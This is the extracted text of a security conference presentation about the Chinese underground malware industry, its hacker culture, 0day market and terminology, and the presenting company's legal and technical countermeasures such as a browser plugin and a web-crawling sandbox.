View
222
Download
2
Category
Tags:
Preview:
Citation preview
Front Line ReportFighting Against Malware in China
ZhaoWei KnownSec
Who am I?Who are we?
About This Presentation
1.Part One: China hacker culture 2.Part Two: Underground industry3.Part Three: How we fight back?
Where are they from? Where are they head to?
Blackhats and WhitehatsWhere we start?
Where we learned?• Coolfire 1996• Isbase 1997• Xfocus 1999• Hack.co.ca• Packetstorm• Core Security• w00w00• Bugtraq• Phrack• EFNET• TESO• The hack’s choice• Daily Dave• FD• ……
Time line:• Unix Hacking• Stack overflow• Format string• Heap overflow• Int overflow• Sql injection• Backdoor• Kenerl Rootkit• Worm(Redcode…)• Mass Injection• XSS and worm• Web2.0
Blackhats and Whitehats4 waves
1. Server Side Wave 1998-20031) IIS, Serv-U, Apache, Samba, Jabberd etc
2. Client Side Trend 2002-20071) Image format: ANI, JPG, BMP etc2) Windows Office doc, ppt etc3) IE: ActiveX, HTML parser, XML parser
3. 3rd party applications attacking 2006-NOW, this one only for profit
Blackhats and WhitehatsWhat are they doing now
• What are they doing now?oWhiteHat:MOST of them are working for
security companies(M,K,S,V,N,T). Security research
Anti-(virus,rootkit,exploit) Developing Scanner and IDS etc.
Find 0days Windows, Linux, Unix Developing exploits
Boring? So some time they get leaked ZDI Underground market
Blackhats and WhitehatsWhat are they doing now
BlackHat: They have their own industry! Developing Worms, rootkit, 0days DDoS websites for profit and fun
China has best anti-DDOS device Stealing all of cool things they like
All kinds of Game,WOW! They control the virtual economy
QQ, 支付宝( Taobao) , all thing related to money Even some private porn.
Competition on developing exps? No, who can give more money.
Blackhats and WhitehatsFamous Cases
Blackhats and WhitehatsTrend
1.Age: Younger!(maybe not) , Talent and Rich 2.Area: Most are not from the big cities
o Why? Economic related?o More fired engineers more hackers?
3.Blackhat Culture: Baidu zhidao forum, QQ4.Underground Industry: Every one has a role.5.Where: More public forum or QQ not use irc
anymore6.International? Not yet!
Underground Malware Industry
Underground Malware Industry Now
China is not only the world’s factory, but also world’s malware factory
They totally changed our life1. My parents computer!2. Changed how people are using the network/internet3. Users are pushed to learn security
Underground Malware Industry Terms
挂马 (GuaMa), Hooking Horse: Inject malcode into websites网马 (WangMa), Net Horse: Exploits for IE木马 (MuMa), Wood Horse: Backdoor, Rootkit, Downloader etc
箱子 (XiangZi), Box: Some web service store stole information信封 (XinFeng), Envelop: some data contains stolen information免杀 (MianSha), Bypass the Anti-virus…
Underground Malware IndustryMap
E-Dealer
Gaming Team
Traffic Vendor
Security Researcher
Crack/Steal Box
Website Cracker
Plugin Vendor
Virus Developer
Internet Users
$$
E-Property Buyer
Internet
Controlled Traffic
Cracker Area
Inject Mal-Codere-sellers
re-sellers
Surf Internet
Owned Website/Traffic
PAY
Latest hacking tech
PAYLatest virus and malwares
PAY
E-Property TradingE-Property Trading
SALES
Technical Area
Underground Malware Industry
Victim controlled/Privacy leak
Org or Individual
PAY
Selling all kind of information
G-Dealer
Sub-dealer
Website/Pages
Mal Hosting
Underground Malware Industry Trend
1. From 06-07 they starting using 3rd party vulns,Why?1) Very big local market and huge mount of users2) Users know more about security now(patch system, using
anti-virus etc.)3) Some local security vendors supply patch service to pirate
Windows user (They all love it)4) Windows 0day really expensive now5) Local application vendors are totally lame (sell them Fortify!)
2. They use 0day in massive attack, I never saw this before 2006,This definitely a phenomenon
3. More 0days?1) RealPlayer2) Flash3) XunLei*4) UUSee5) Sina
Underground Malware Industry Technique Trend
1. They like exploiting logic bugs
1) Baidu Toolbar2) Snapshot
2. Anti Anti-VirusDetect if Anti-virus exist
3. Bypass anti-virus, they charge money to make your malware bypass:1) Kaspersky2) Nod323) Rising4) Kingsoft
Underground Malware Industry 0day Market Underground
1. They love client-side vulnerabilities.1) Maybe they are more easy to find2) They love local application bugs, cheaper and useful
2. The price is more exciting than ZDI1) Researchers like ZDI2) Black don’t they just use it
3. Sometimes 0day are leaked to market1) Security researchers2) Professional whitehat.
Underground Malware Industry Real Case
It’s the most powerful malware hosting box at China Massive injection Worm!
Underground Malware Industry Real Case
Underground Malware Industry Real Case
Underground Malware Industry Real Case
Underground Malware Industry Next?
• Web 2.0? SNS worm• Interactive web malware
• Interact with user to make anti anti-virus• Authentication• Flash AS• Silverlight?
How we fight BACK!
How We Fight BACK!
• Law: sue them!• Tech: China web reputation system
How We Fight BACK!Rogue Software
• We started China Anti-Malware Alliance in 2006
• We collect evidence and we sued them• Yahoo China• Ebay China
• Win only 1 of 9 cases, we won the Shanghai case• Some of them are really powerful at the local area
How We Fight BACK!Rogue Software
• Definition of Rogue software now, We win!A call for input from the general public was made on November 8, when the ISC
published its draft proposal and wanted to find out how Chinese web surfers felt about the problem.
Spyware/Adware must also follow at least one of the following additional criteria as set out in Chinese sources:
• Be installed without notification or approval• Not offer an uninstall service or remain after removal• Make changes to the user’s browser or any other settings without permission,
disabling access to the Internet or forcing to visit certain websites• Trigger pop-ups• Collect user data without notification or permission• Mislead users to uninstall non-malicious software• Be bundled with other known malware• Have any other issues that infringe the user's "right to know" and "right to choose."
How We Fight BACK!Malware
• The true problem:• 80-90% victims got infected from the
web• Vulnerabilities in Internet Explorer and
3rd party vulnerabilities• 0day world! Using 0day attacking
people • What we can do for users?
• Make a safer IE?• Make a clean/trustworthy web?
How We Fight BACK!Malware
• An IE security enhancement: • Security plugin our company made:
365menshen (365门神)• Anti Phishing, HIPS• Mark out malware URLs• Supply some web services for customers
• There are other services: • SiteAdvisor, Finjan, MyWOT
• Also IE8 is much better than previous versions
How We Fight BACK!365menshen
How We Fight BACK!Web
• Make a cleaner web• We need find all bad web site in China• We need signatures, sandbox and crawler
• Make more trustworthy web• We need anti phishing• May be Phishtank• Need a trusted source
How We Fight BACK!Crawler and Sandbox
• We are not Google• Lacking enough bandwidth • Not enough servers (just mist/water vapor
rather than a cloud )• So these make our sandbox different
• The main idea is not get infected • Lightweight, faster• Behavior basis (APIs)• Suitable for China
How We Fight BACK! Crawler and Sandbox ScanW
• We start at 2006• We learned from:
• Google safe browsing• Microsoft HoneyMonkey• McAfee SiteAdvisor
• We based on:• Vmware Server 2.0• Python 2.5• Django 1.0• C
• We try to move these things to:• Google APP
engine(GFW?)• Or using Hadoop(java)?
Demo
1. Ecosystem plus Free Anti-virus softeware
2. Pushing SDL to software vendors
3. Web server side ecosystem?
China Marketing
Q/AThank You!
ic@scanw.com
Recommended